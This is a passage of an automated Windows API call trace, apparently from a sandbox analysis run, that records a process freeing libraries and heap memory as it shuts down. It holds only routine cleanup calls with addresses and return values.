[0149.651] LocalFree (hMem=0x1cff6aaf2a0) returned 0x0 [0149.651] GlobalHandle (pMem=0x1cff6a72bc0) returned 0x1cff83d0008 [0149.651] GlobalUnlock (hMem=0x1cff83d0008) returned 0 [0149.656] FreeLibrary (hLibModule=0x7ffe5f450000) returned 1 [0149.658] FreeLibrary (hLibModule=0x7ffe62b60000) returned 1 [0149.660] FreeLibrary (hLibModule=0x7ffe62970000) returned 1 [0149.666] FreeLibrary (hLibModule=0x7ffe5fa60000) returned 1 [0149.667] FreeLibrary (hLibModule=0x7ffe62b50000) returned 1 [0149.672] FreeLibrary (hLibModule=0x7ffe5fa00000) returned 1 [0149.914] FreeLibrary (hLibModule=0x7ffe5ed60000) returned 1 [0150.214] FreeLibrary (hLibModule=0x7ffe62a60000) returned 1 [0150.215] FreeLibrary (hLibModule=0x7ffe54840000) returned 1 [0150.226] FreeLibrary (hLibModule=0x7ffe54780000) returned 1 [0150.227] FreeLibrary (hLibModule=0x7ffe54740000) returned 1 [0150.231] FreeLibrary (hLibModule=0x7ffe5ff50000) returned 1 [0150.232] FreeLibrary (hLibModule=0x7ffe5ed40000) returned 1 [0150.233] FreeLibrary (hLibModule=0x7ffe5fb70000) returned 1 [0150.234] FreeLibrary (hLibModule=0x7ffe546b0000) returned 1 [0150.410] FreeLibrary (hLibModule=0x7ffe5ea80000) returned 1 [0150.412] FreeLibrary (hLibModule=0x7ffe5c720000) returned 1 [0150.416] FreeLibrary (hLibModule=0x7ffe544f0000) returned 1 [0150.853] GetProcessHeap () returned 0x1cff6a50000 [0150.853] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a9bae0) returned 1 [0150.853] GetProcessHeap () returned 0x1cff6a50000 [0150.853] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a5eb80) returned 1 [0150.853] GetProcessHeap () returned 0x1cff6a50000 [0150.853] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a5e540) returned 1 [0150.853] GetProcessHeap () returned 0x1cff6a50000 [0150.854] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a5e900) returned 1 [0150.854] GetProcessHeap () returned 0x1cff6a50000 [0150.854] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a5e560) returned 1 [0150.854] GetProcessHeap () returned 0x1cff6a50000 [0150.854] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a5eba0) returned 1 [0150.854] GetProcessHeap () returned 0x1cff6a50000 [0150.854] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a5e580) returned 1 [0150.854] GetProcessHeap () returned 0x1cff6a50000 [0150.854] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a5ebc0) returned 1 [0150.854] GetProcessHeap () returned 0x1cff6a50000 [0150.854] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a5e8e0) returned 1 [0150.854] GetProcessHeap () returned 0x1cff6a50000 [0150.854] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a5eb60) returned 1 [0150.854] GetProcessHeap () returned 0x1cff6a50000 [0150.854] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a5e5e0) returned 1 [0150.854] GetProcessHeap () returned 0x1cff6a50000 [0150.854] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a5e820) returned 1 [0150.854] GetProcessHeap () returned 0x1cff6a50000 [0150.854] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a5eac0) returned 1 [0150.854] GetProcessHeap () returned 0x1cff6a50000 [0150.854] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a5ec40) returned 1 [0150.854] GetProcessHeap () returned 0x1cff6a50000 [0150.854] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a5e8a0) returned 1 [0150.854] GetProcessHeap () returned 0x1cff6a50000 [0150.854] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a5eb00) returned 1 [0150.854] GetProcessHeap () returned 0x1cff6a50000 [0150.854] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a5e5a0) returned 1 [0150.854] GetProcessHeap () returned 0x1cff6a50000 [0150.854] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a5e700) returned 1 [0150.854] GetProcessHeap () returned 0x1cff6a50000 [0150.854] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a5e960) returned 1 [0150.854] GetProcessHeap () returned 0x1cff6a50000 [0150.854] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a5e8c0) returned 1 [0150.854] GetProcessHeap () returned 0x1cff6a50000 [0150.854] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a5eb40) returned 1 [0150.854] GetProcessHeap () returned 0x1cff6a50000 [0150.854] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a5e740) returned 1 [0150.854] GetProcessHeap () returned 0x1cff6a50000 [0150.854] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a5e520) returned 1 [0150.855] GetProcessHeap () returned 0x1cff6a50000 [0150.855] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a5e780) returned 1 [0150.855] GetProcessHeap () returned 0x1cff6a50000 [0150.855] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a5ebe0) returned 1 [0150.855] GetProcessHeap () returned 0x1cff6a50000 [0150.855] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a5e640) returned 1 [0150.855] GetProcessHeap () returned 0x1cff6a50000 [0150.855] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a5eb20) returned 1 [0150.855] GetProcessHeap () returned 0x1cff6a50000 [0150.855] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a5e880) returned 1 [0150.855] GetProcessHeap () returned 0x1cff6a50000 [0150.855] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a5ec00) returned 1 [0150.855] GetProcessHeap () returned 0x1cff6a50000 [0150.855] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a5eae0) returned 1 [0150.855] GetProcessHeap () returned 0x1cff6a50000 [0150.855] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a5e7a0) returned 1 [0150.855] GetProcessHeap () returned 0x1cff6a50000 [0150.855] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a5e860) returned 1 [0150.855] GetProcessHeap () returned 0x1cff6a50000 [0150.855] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a5e940) returned 1 [0150.855] GetProcessHeap () returned 0x1cff6a50000 [0150.855] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a5e9a0) returned 1 [0150.855] GetProcessHeap () returned 0x1cff6a50000 [0150.855] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a5ec20) returned 1 [0150.855] GetProcessHeap () returned 0x1cff6a50000 [0150.855] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a5e4c0) returned 1 [0150.855] GetProcessHeap () returned 0x1cff6a50000 [0150.855] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a5e920) returned 1 [0150.855] GetProcessHeap () returned 0x1cff6a50000 [0150.855] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a5e600) returned 1 [0150.855] GetProcessHeap () returned 0x1cff6a50000 [0150.855] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a5e4e0) returned 1 [0150.855] GetProcessHeap () returned 0x1cff6a50000 [0150.855] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a5e620) returned 1 [0150.855] GetProcessHeap () returned 0x1cff6a50000 [0150.855] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a5e980) returned 1 [0150.855] GetProcessHeap () returned 0x1cff6a50000 [0150.855] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a5e500) returned 1 [0150.855] GetProcessHeap () returned 0x1cff6a50000 [0150.855] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a5e660) returned 1 [0150.856] GetProcessHeap () returned 0x1cff6a50000 [0150.856] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a5e9c0) returned 1 [0150.856] GetProcessHeap () returned 0x1cff6a50000 [0150.856] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a5e5c0) returned 1 [0150.856] GetProcessHeap () returned 0x1cff6a50000 [0150.856] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a5e9e0) returned 1 [0150.856] GetProcessHeap () returned 0x1cff6a50000 [0150.856] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a5e680) returned 1 [0150.856] GetProcessHeap () returned 0x1cff6a50000 [0150.856] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a5e6a0) returned 1 [0150.856] GetProcessHeap () returned 0x1cff6a50000 [0150.856] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a5ea00) returned 1 [0150.856] GetProcessHeap () returned 0x1cff6a50000 [0150.856] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a5ea20) returned 1 [0150.856] GetProcessHeap () returned 0x1cff6a50000 [0150.856] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a5e7c0) returned 1 [0150.856] GetProcessHeap () returned 0x1cff6a50000 [0150.856] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a5ea40) returned 1 [0150.856] GetProcessHeap () returned 0x1cff6a50000 [0150.856] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a5e6c0) returned 1 [0150.856] GetProcessHeap () returned 0x1cff6a50000 [0150.856] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a5e840) returned 1 [0150.856] GetProcessHeap () returned 0x1cff6a50000 [0150.856] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a5e720) returned 1 [0150.856] GetProcessHeap () returned 0x1cff6a50000 [0150.856] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a5e760) returned 1 [0150.856] GetProcessHeap () returned 0x1cff6a50000 [0150.856] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a5ea60) returned 1 [0150.856] GetProcessHeap () returned 0x1cff6a50000 [0150.856] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a5eaa0) returned 1 [0150.856] GetProcessHeap () returned 0x1cff6a50000 [0150.856] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a5ea80) returned 1 [0150.856] GetProcessHeap () returned 0x1cff6a50000 [0150.856] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a5e6e0) returned 1 [0150.856] GetProcessHeap () returned 0x1cff6a50000 [0150.856] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a5e7e0) returned 1 [0150.856] GetProcessHeap () returned 0x1cff6a50000 [0150.856] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a5e800) returned 1 [0150.856] GetProcessHeap () returned 0x1cff6a50000 [0150.857] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a5fd00) returned 1 [0150.857] GetProcessHeap () returned 0x1cff6a50000 [0150.857] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a600e0) returned 1 [0150.857] GetProcessHeap () returned 0x1cff6a50000 [0150.857] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a5fce0) returned 1 [0150.857] GetProcessHeap () returned 0x1cff6a50000 [0150.857] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a5fe80) returned 1 [0150.857] GetProcessHeap () returned 0x1cff6a50000 [0150.857] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a60440) returned 1 [0150.857] GetProcessHeap () returned 0x1cff6a50000 [0150.857] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a600a0) returned 1 [0150.857] GetProcessHeap () returned 0x1cff6a50000 [0150.857] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a602c0) returned 1 [0150.857] GetProcessHeap () returned 0x1cff6a50000 [0150.857] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a5fd40) returned 1 [0150.857] GetProcessHeap () returned 0x1cff6a50000 [0150.857] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a60360) returned 1 [0150.857] GetProcessHeap () returned 0x1cff6a50000 [0150.857] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a60320) returned 1 [0150.857] GetProcessHeap () returned 0x1cff6a50000 [0150.857] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a603e0) returned 1 [0150.857] GetProcessHeap () returned 0x1cff6a50000 [0150.857] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a603a0) returned 1 [0150.857] GetProcessHeap () returned 0x1cff6a50000 [0150.857] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a5ff80) returned 1 [0150.857] GetProcessHeap () returned 0x1cff6a50000 [0150.857] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a5fe60) returned 1 [0150.857] GetProcessHeap () returned 0x1cff6a50000 [0150.857] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a5fda0) returned 1 [0150.857] GetProcessHeap () returned 0x1cff6a50000 [0150.857] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a5ffa0) returned 1 [0150.857] GetProcessHeap () returned 0x1cff6a50000 [0150.857] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a5ffc0) returned 1 [0150.857] GetProcessHeap () returned 0x1cff6a50000 [0150.857] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a60400) returned 1 [0150.857] GetProcessHeap () returned 0x1cff6a50000 [0150.857] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a60000) returned 1 [0150.857] GetProcessHeap () returned 0x1cff6a50000 [0150.857] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a60240) returned 1 [0150.857] GetProcessHeap () returned 0x1cff6a50000 [0150.858] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a601e0) returned 1 [0150.858] GetProcessHeap () returned 0x1cff6a50000 [0150.858] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a60200) returned 1 [0150.858] GetProcessHeap () returned 0x1cff6a50000 [0150.858] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a60040) returned 1 [0150.858] GetProcessHeap () returned 0x1cff6a50000 [0150.858] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a5fea0) returned 1 [0150.858] GetProcessHeap () returned 0x1cff6a50000 [0150.858] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a602a0) returned 1 [0150.858] GetProcessHeap () returned 0x1cff6a50000 [0150.858] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a5fec0) returned 1 [0150.858] GetProcessHeap () returned 0x1cff6a50000 [0150.858] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a60300) returned 1 [0150.858] GetProcessHeap () returned 0x1cff6a50000 [0150.858] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a5ffe0) returned 1 [0150.858] GetProcessHeap () returned 0x1cff6a50000 [0150.858] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a602e0) returned 1 [0150.858] GetProcessHeap () returned 0x1cff6a50000 [0150.858] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a60120) returned 1 [0150.858] GetProcessHeap () returned 0x1cff6a50000 [0150.858] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a5fe20) returned 1 [0150.858] GetProcessHeap () returned 0x1cff6a50000 [0150.858] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a5fd60) returned 1 [0150.858] GetProcessHeap () returned 0x1cff6a50000 [0150.858] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a601c0) returned 1 [0150.858] GetProcessHeap () returned 0x1cff6a50000 [0150.858] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a60160) returned 1 [0150.858] GetProcessHeap () returned 0x1cff6a50000 [0150.858] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a60080) returned 1 [0150.858] GetProcessHeap () returned 0x1cff6a50000 [0150.858] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a60340) returned 1 [0150.858] GetProcessHeap () returned 0x1cff6a50000 [0150.858] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a60260) returned 1 [0150.858] GetProcessHeap () returned 0x1cff6a50000 [0150.858] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a60460) returned 1 [0150.858] GetProcessHeap () returned 0x1cff6a50000 [0150.858] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a5fee0) returned 1 [0150.858] GetProcessHeap () returned 0x1cff6a50000 [0150.858] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a60020) returned 1 [0150.858] GetProcessHeap () returned 0x1cff6a50000 [0150.858] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a5ff00) returned 1 [0150.859] GetProcessHeap () returned 0x1cff6a50000 [0150.859] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a60380) returned 1 [0150.859] GetProcessHeap () returned 0x1cff6a50000 [0150.859] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a60060) returned 1 [0150.859] GetProcessHeap () returned 0x1cff6a50000 [0150.859] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a5ff40) returned 1 [0150.859] GetProcessHeap () returned 0x1cff6a50000 [0150.859] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a5ff20) returned 1 [0150.859] GetProcessHeap () returned 0x1cff6a50000 [0150.859] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a600c0) returned 1 [0150.859] GetProcessHeap () returned 0x1cff6a50000 [0150.859] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a60100) returned 1 [0150.859] GetProcessHeap () returned 0x1cff6a50000 [0150.859] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a5ff60) returned 1 [0150.859] GetProcessHeap () returned 0x1cff6a50000 [0150.859] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a5fe40) returned 1 [0150.859] GetProcessHeap () returned 0x1cff6a50000 [0150.859] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a60140) returned 1 [0150.859] GetProcessHeap () returned 0x1cff6a50000 [0150.859] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a60220) returned 1 [0150.859] GetProcessHeap () returned 0x1cff6a50000 [0150.859] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a60180) returned 1 [0150.859] GetProcessHeap () returned 0x1cff6a50000 [0150.859] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a601a0) returned 1 [0150.859] GetProcessHeap () returned 0x1cff6a50000 [0150.859] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a60280) returned 1 [0150.859] GetProcessHeap () returned 0x1cff6a50000 [0150.859] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a603c0) returned 1 [0150.859] GetProcessHeap () returned 0x1cff6a50000 [0150.859] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a60420) returned 1 [0150.859] GetProcessHeap () returned 0x1cff6a50000 [0150.859] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a5fd20) returned 1 [0150.859] GetProcessHeap () returned 0x1cff6a50000 [0150.859] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a5fd80) returned 1 [0150.859] GetProcessHeap () returned 0x1cff6a50000 [0150.859] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a5fdc0) returned 1 [0150.859] GetProcessHeap () returned 0x1cff6a50000 [0150.859] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a5fde0) returned 1 [0150.859] GetProcessHeap () returned 0x1cff6a50000 [0150.859] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a5fe00) returned 1 [0150.859] GetProcessHeap () returned 0x1cff6a50000 [0150.860] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a605d0) returned 1 [0150.860] GetProcessHeap () returned 0x1cff6a50000 [0150.860] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a60710) returned 1 [0150.860] GetProcessHeap () returned 0x1cff6a50000 [0150.860] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a60730) returned 1 [0150.860] GetProcessHeap () returned 0x1cff6a50000 [0150.860] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a60ad0) returned 1 [0150.860] GetProcessHeap () returned 0x1cff6a50000 [0150.860] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a606d0) returned 1 [0150.860] GetProcessHeap () returned 0x1cff6a50000 [0150.860] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a60750) returned 1 [0150.860] GetProcessHeap () returned 0x1cff6a50000 [0150.860] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a60af0) returned 1 [0150.860] GetProcessHeap () returned 0x1cff6a50000 [0150.860] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a60a50) returned 1 [0150.860] GetProcessHeap () returned 0x1cff6a50000 [0150.860] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a60610) returned 1 [0150.860] GetProcessHeap () returned 0x1cff6a50000 [0150.860] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a60790) returned 1 [0150.860] GetProcessHeap () returned 0x1cff6a50000 [0150.860] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a60c50) returned 1 [0150.860] GetProcessHeap () returned 0x1cff6a50000 [0150.860] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a60650) returned 1 [0150.860] GetProcessHeap () returned 0x1cff6a50000 [0150.860] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a60530) returned 1 [0150.860] GetProcessHeap () returned 0x1cff6a50000 [0150.860] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a60c70) returned 1 [0150.860] GetProcessHeap () returned 0x1cff6a50000 [0150.860] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a60c10) returned 1 [0150.860] GetProcessHeap () returned 0x1cff6a50000 [0150.860] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a605b0) returned 1 [0150.860] GetProcessHeap () returned 0x1cff6a50000 [0150.860] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a60bb0) returned 1 [0150.860] GetProcessHeap () returned 0x1cff6a50000 [0150.860] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a60770) returned 1 [0150.860] GetProcessHeap () returned 0x1cff6a50000 [0150.860] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a60b30) returned 1 [0150.860] GetProcessHeap () returned 0x1cff6a50000 [0150.860] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a60bf0) returned 1 [0150.860] GetProcessHeap () returned 0x1cff6a50000 [0150.861] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a608d0) returned 1 [0150.861] GetProcessHeap () returned 0x1cff6a50000 [0150.861] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a60630) returned 1 [0150.861] GetProcessHeap () returned 0x1cff6a50000 [0150.861] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a60850) returned 1 [0150.861] GetProcessHeap () returned 0x1cff6a50000 [0150.861] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a60a30) returned 1 [0150.861] GetProcessHeap () returned 0x1cff6a50000 [0150.861] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a607f0) returned 1 [0150.861] GetProcessHeap () returned 0x1cff6a50000 [0150.861] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a60870) returned 1 [0150.861] GetProcessHeap () returned 0x1cff6a50000 [0150.861] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a60b10) returned 1 [0150.861] GetProcessHeap () returned 0x1cff6a50000 [0150.861] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a60b90) returned 1 [0150.861] GetProcessHeap () returned 0x1cff6a50000 [0150.861] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a608f0) returned 1 [0150.861] GetProcessHeap () returned 0x1cff6a50000 [0150.861] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a60a70) returned 1 [0150.861] GetProcessHeap () returned 0x1cff6a50000 [0150.861] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a607b0) returned 1 [0150.861] 